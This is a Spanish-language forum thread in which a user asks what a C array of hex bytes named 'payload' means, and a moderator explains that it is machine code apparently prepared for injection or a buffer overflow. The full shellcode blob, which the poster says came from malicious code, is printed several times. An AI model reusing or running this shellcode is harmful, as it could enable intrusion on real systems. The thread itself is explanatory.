none
Que significa esto? "\x33\xc9\x83\xe9\xb8\xe8" ???????? RRS feed

  • Pregunta

  • Hola a todos nuevamente, que días que estaba chekeando algunos comandos en internet me topé con un código que a un vector sin limite osea vector[] le asignaba estas cosas "\x33\xc9\x83\xe9\xb8\xe8" qusiera saber que es, y para que se usa, muchas gracias, ya que quede loco con ese vector sin fin y con esos garabatos, les dejo el codigo, Gracias! al que me resuelva las dudas =D.

    unsigned char payload[] =

    "\x33\xc9\x83\xe9\xb8\xe8"

    "\xff\xff\xff\xff"

    "\xc0\x5e\x81\x76\x0e\x4a"

    "\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"

    "\x73\xf4\xa2\xde\x67\x46"

    "\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"

    "\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"

    "\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"

    "\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"

    "\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"

    "\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"

    "\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"

    "\x8b\x15\x73\x67\x69" // w0w

    "\x22\xec\x75\x45\x71\x77\x67"

    "\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"

    "\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"

    "\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"

    "\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"

    "\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"

    "\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"

    "\x08\x0b\x15\xc3\x72\x8c\x33" // r0x

    "\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"

    "\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"

    "\x20\x26\xc9\xe8\x1f\x76\x67\x69"

    "\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"

    "\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"

    "\xa8\x54\xcb\x46\x9c"  // c0d3d

    "\xd8\x48\xb9\x90\x90\x90";

    miércoles, 23 de junio de 2010 19:03

Respuestas

  • Eso es "código emitido". Lo que está haciendo es meter có digo ensamblador  
    en una variable para luego saltar a ella y ejecutar dicho código, o  para  
    inyectarlo en algún lado, y por el nombre de la variable tiene toda  la  
    pinta de ser la preparación de bloque de código para realizar  un  
    desbordamiento de buffer...
     
    En los últimos Windows con DEP activado, eso debería hacer sal tar todas  
    las alarmas del propio Windows y de cualquier antivirus instalado.
     
    On Wed, 23 Jun 2010 21:03:15 +0200, <thEpisode> wrote:
     
    > Hola a todos nuevamente, que días que estaba chekeando algunos co mandos  
    > en
    > internet me topé con un código que a un vector sin limite os ea vector[]  
    > le
    > asignaba estas cosas "\x33\xc9\x83\xe9\xb8\xe8" qusiera saber que es,  y  
    > para que
    > se usa, muchas gracias, ya que quede loco con ese vector sin fin y con   
    > esos
    > garabatos, les dejo el codigo, Gracias! al que me resuelva las dudas = D.
    >
    > unsigned char payload[]  >
    > "\x33\xc9\x83\xe9\xb8\xe8"
    >
    > "\xff\xff\xff\xff"
    >
    > "\xc0\x5e\x81\x76\x0e\x4a"
    >
    > "\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"
    >
    > "\x73\xf4\xa2\xde\x67\x46"
    >
    > "\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"
    >
    > "\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"
    >
    > "\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"
    >
    > "\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"
    >
    > "\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"
    >
    > "\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"
    >
    > "\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"
    >
    > "\x8b\x15\x73\x67\x69" // w0w
    >
    > "\x22\xec\x75\x45\x71\x77\x67"
    >
    > "\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"
    >
    > "\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"
    >
    > "\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"
    >
    > "\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"
    >
    > "\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"
    >
    > "\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"
    >
    > "\x08\x0b\x15\xc3\x72\x8c\x33" // r0x
    >
    > "\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"
    >
    > "\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"
    >
    > "\x20\x26\xc9\xe8\x1f\x76\x67\x69"
    >
    > "\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"
    >
    > "\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"
    >
    > "\xa8\x54\xcb\x46\x9c" // c0d3d
    >
    > "\xd8\x48\xb9\x90\x90\x90";
    >
     -- 
    Microsoft Visual C++ MVP => http://geeks.ms/blogs/rfog
    ======================== =============== La infantería española nunca retrocede. Da media vuelta y sigu e avanzando.
     -- Graffiti.
     

    MVP Visual C++ - Visita mi blog sobre desarrollo: http://geeks.ms/blogs/rfog/
    miércoles, 30 de junio de 2010 15:00
    Moderador

Todas las respuestas

  • Eso es "código emitido". Lo que está haciendo es meter có digo ensamblador  
    en una variable para luego saltar a ella y ejecutar dicho código, o  para  
    inyectarlo en algún lado, y por el nombre de la variable tiene toda  la  
    pinta de ser la preparación de bloque de código para realizar  un  
    desbordamiento de buffer...
     
    En los últimos Windows con DEP activado, eso debería hacer sal tar todas  
    las alarmas del propio Windows y de cualquier antivirus instalado.
     
    On Wed, 23 Jun 2010 21:03:15 +0200, <thEpisode> wrote:
     
    > Hola a todos nuevamente, que días que estaba chekeando algunos co mandos  
    > en
    > internet me topé con un código que a un vector sin limite os ea vector[]  
    > le
    > asignaba estas cosas "\x33\xc9\x83\xe9\xb8\xe8" qusiera saber que es,  y  
    > para que
    > se usa, muchas gracias, ya que quede loco con ese vector sin fin y con   
    > esos
    > garabatos, les dejo el codigo, Gracias! al que me resuelva las dudas = D.
    >
    > unsigned char payload[]  >
    > "\x33\xc9\x83\xe9\xb8\xe8"
    >
    > "\xff\xff\xff\xff"
    >
    > "\xc0\x5e\x81\x76\x0e\x4a"
    >
    > "\x27\x98\xb9\x83\xee\xfc\xe2\xf4\xb6\x4d"
    >
    > "\x73\xf4\xa2\xde\x67\x46"
    >
    > "\xb5\x47\x13\xd5\x6e\x03\x13\xfc\x76\xac\xe4\xbc\x32\x26\x77\x32"
    >
    > "\x05\x3f\x13\xe6\x6a\x26\x73\xf0\xc1\x13\x13\xb8\xa4\x16\x58\x20"
    >
    > "\xe6\xa3\x58\xcd\x4d\xe6\x52\xb4\x4b\xe5\x73\x4d\x71\x73\xbc\x91"
    >
    > "\x3f\xc2\x13\xe6\x6e\x26\x73\xdf\xc1\x2b\xd3\x32\x15\x3b\x99\x52"
    >
    > "\x49\x0b\x13\x30\x26\x03\x84\xd8\x89\x16\x43\xdd\xc1\x64\xa8\x32"
    >
    > "\x0a\x2b\x13\xc9\x56\x8a\x13\xf9\x42\x79\xf0\x37\x04\x29\x74\xe9"
    >
    > "\xb5\xf1\xfe\xea\x2c\x4f\xab\x8b\x22\x50\xeb"
    >
    > "\x8b\x15\x73\x67\x69" // w0w
    >
    > "\x22\xec\x75\x45\x71\x77\x67"
    >
    > "\x6f\x15\xae\x7d\xdf\xcb\xca\x90\xbb"
    >
    > "\x1f\x4d\x9a\x46\x9a\x4f\x41\xb0\xbf\x8a\xcf\x46\x9c\x74\xcb\xea"
    >
    > "\x19\x64\xcb\xfa\x19\xd8\x48\xd1\x35\x27\x98\xb8\x2c\x4f\x9a\x23"
    >
    > "\x2c\x74\x11\x58\xdf\x4f\x74\x40\xe0\x47\xcf\x46\x9c\x4d\x88\xe8"
    >
    > "\x1f\xd8\x48\xdf\x20\x43\xfe\xd1\x29\x4a\xf2\xe9\x13\x0e\x54\x30"
    >
    > "\xad\x4d\xdc\x30\xa8\x16\x58\x4a\xe0\xb2\x11\x44\xb4\x65\xb5\x47"
    >
    > "\x08\x0b\x15\xc3\x72\x8c\x33" // r0x
    >
    > "\x12\x22\x55\x66\x0a\x5c\xd8\xed\x91"
    >
    > "\xb5\xf1\xc3\xee\x18\x76\xc9\xe8"
    >
    > "\x20\x26\xc9\xe8\x1f\x76\x67\x69"
    >
    > "\x22\x8a\x41\xbc\x84\x74\x67\x6f\x20\xd8\x67\x8e\xb5\xf7\xf0\x5e"
    >
    > "\x33\xe1\xe1\x46\x3f\x23\x67\x6f\xb5\x50\x64\x46\x9a\x4f\xe6\x61"
    >
    > "\xa8\x54\xcb\x46\x9c" // c0d3d
    >
    > "\xd8\x48\xb9\x90\x90\x90";
    >
     -- 
    Microsoft Visual C++ MVP => http://geeks.ms/blogs/rfog
    ======================== =============== La infantería española nunca retrocede. Da media vuelta y sigu e avanzando.
     -- Graffiti.
     

    MVP Visual C++ - Visita mi blog sobre desarrollo: http://geeks.ms/blogs/rfog/
    miércoles, 30 de junio de 2010 15:00
    Moderador
  • Ahhhh, muchas gracias, no sabía q eso era assambler, y si el codigo de donde lo extraje era malicioso,pero ps no entendía q era eso, gracias!! =D
    miércoles, 30 de junio de 2010 19:06
  • Exactamente código ensamblador no es, más bien esos númer os terminan  
    siendo los códigos de operación que representan las instruccio nes reales.
     
    Cuando uno escribe algo como
     
    mov ax,bx
     
    el ensamblador (el programa) transforma eso en una serie de números  que se  
    corresponden con dicha instrucción y es lo que realmente entiende e l  
    microproceador.
     
    Lo que representa esa tabla son esos números, que luego ejecutar� � el  
    microprocesador. Esa es una forma de representarlos en C para que el  
    compilador de C pueda convertirlos en dicho código bianrio.
     
    On Wed, 30 Jun 2010 21:06:46 +0200, <thEpisode> wrote:
     
    > Ahhhh, muchas gracias, no sabía q eso era assambler, y si el codi go de  
    > donde lo
    > extraje era malicioso,pero ps no entendía q era eso, gracias!! = D
     -- 
    Microsoft Visual C++ MVP => http://geeks.ms/blogs/rfog
    ======================== =============== La infantería española nunca retrocede. Da media vuelta y sigu e avanzando.
     -- Graffiti.
     

    MVP Visual C++ - Visita mi blog sobre desarrollo: http://geeks.ms/blogs/rfog/
    miércoles, 30 de junio de 2010 19:20
    Moderador